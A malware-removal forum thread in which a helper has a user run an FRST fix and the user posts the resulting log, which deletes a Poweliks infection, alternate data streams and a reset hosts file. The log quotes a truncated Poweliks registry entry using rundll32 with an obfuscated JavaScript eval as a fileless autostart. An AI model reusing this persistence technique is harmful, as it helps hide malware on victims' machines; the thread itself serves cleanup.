AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
Hosts:
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • Fixlog.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#10 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 30 December 2014 - 04:13 PM

Ok I can do all this momentarily. Is it safe to hook an external or flash drive up to the computer to back up some files? Can I wait on that until after the FRST attempt? Or could this potentially hurt my files? Should I try to transfer my important files to an external drive first? Or would this put the external drive at risk? I am also in the process of changing many passwords.



#11 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 30 December 2014 - 04:26 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 28-12-2014
Ran by JWT at 2014-12-30 15:25:53 Run:1
Running from C:\Users\JWT\Desktop
Loaded Profile: JWT (Available profiles: JWT)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
U3 swmidi; No ImagePath
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
Hosts:
*****************
 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => Key not found. 
"HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => Key deleted successfully.
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => Key deleted successfully.
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => Key deleted successfully.
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => Key not found. 
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
Chrome DefaultSuggestURL deleted successfully.
swmidi => Service deleted successfully.
C:\ProgramData\Microsoft => ":8S9cANgWAAQ40ucX3IQ1OC5zYd" ADS removed successfully.
C:\ProgramData\Microsoft => ":KhbmwaIj8jjBmPZ6ss5k5mUEsp" ADS removed successfully.
C:\ProgramData\Microsoft => ":zMy0bnceFNXIi7v4KfGcGQ" ADS removed successfully.
C:\ProgramData\Microsoft => ":ZWJJvkiCrYrhz0W4UN6LZ" ADS removed successfully.
"C:\Users\JWT\Local Settings" => ":2etRg9qQ2C2gSOvMuuOR" ADS not found.
"C:\Users\JWT\Local Settings" => ":sw6mb3lnyxyihjoAwCkoa" ADS not found.
C:\Users\JWT\AppData\Local => ":2etRg9qQ2C2gSOvMuuOR" ADS removed successfully.
C:\Users\JWT\AppData\Local => ":sw6mb3lnyxyihjoAwCkoa" ADS removed successfully.
"C:\Users\JWT\AppData\Local\Application Data" => ":2etRg9qQ2C2gSOvMuuOR" ADS not found.
"C:\Users\JWT\AppData\Local\Application Data" => ":sw6mb3lnyxyihjoAwCkoa" ADS not found.
C:\Users\JWT\AppData\Local\Temp => ":j995bnd0fUf9E6DMrPOoXHhpj" ADS removed successfully.
C:\Users\JWT\AppData\Local\Temp => ":SiOn268klR3MGhq2LXhtpM2gjnMPs" ADS removed successfully.
"C:\Users\JWT\AppData\Local\Temporary Internet Files" => ":N9I8vNxKZhojc6M3zXLVp3" ADS not found.
"C:\Users\JWT\AppData\Local\Temporary Internet Files" => ":YeOaihpQEHsyBGdECvXiSS" ADS not found.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
 
==== End of Fixlog 15:25:53 ====


#12 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 01 January 2015 - 03:09 PM

Hi WTTT3,
 

Is it safe to hook an external or flash drive up to the computer to back up some files? Can I wait on that until after the FRST attempt? Or could this potentially hurt my files? Should I try to transfer my important files to an external drive first? Or would this put the external drive at risk?

It is safe to hook up an external/flash drive to the computer, it will not hurt your files in any way. The external drive is safe too.
 
How is your computer running now?
 
xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#13 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 01 January 2015 - 03:13 PM

I haven't used the computer for 2 days because I was waiting for a reply after I sent the log. I didn't realize that was supposed to be the fix. I was thinking it was going to be a long process and that I was supposed to keep it off the internet. Should I hook it up to the internet and try to run it normally now?



#14 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 01 January 2015 - 03:41 PM

Hi WTTT3,

 

Sometimes the fixing can take a long time, and sometimes not. This infection is not too hard to remove. Yes, use the computer like you would now and see how it is.

 

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#15 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 02 January 2015 - 09:06 AM

Everything seems to be running smoothly. Thank you so much!






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users